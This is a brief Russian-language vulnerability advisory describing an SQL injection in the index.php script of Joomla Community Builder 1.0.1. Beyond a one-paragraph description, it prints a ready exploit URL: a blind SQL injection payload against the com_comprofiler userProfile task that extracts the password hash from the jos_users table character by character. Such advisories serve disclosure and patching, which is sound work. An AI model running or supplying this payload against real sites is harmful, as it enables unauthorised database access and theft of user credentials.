Программа: Joomla Community Builder 1.0.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

/index.php?option=com_comprofiler&task=userProfile&user=[SQL]

/index.php?option=com_comprofiler&task=userProfile&user=1/* */and/**/mid((select/**/password/**/from/**/jos_users/* */limit/**/0,1),1,1)/**/</**/Char(97)/*

Оставить мнение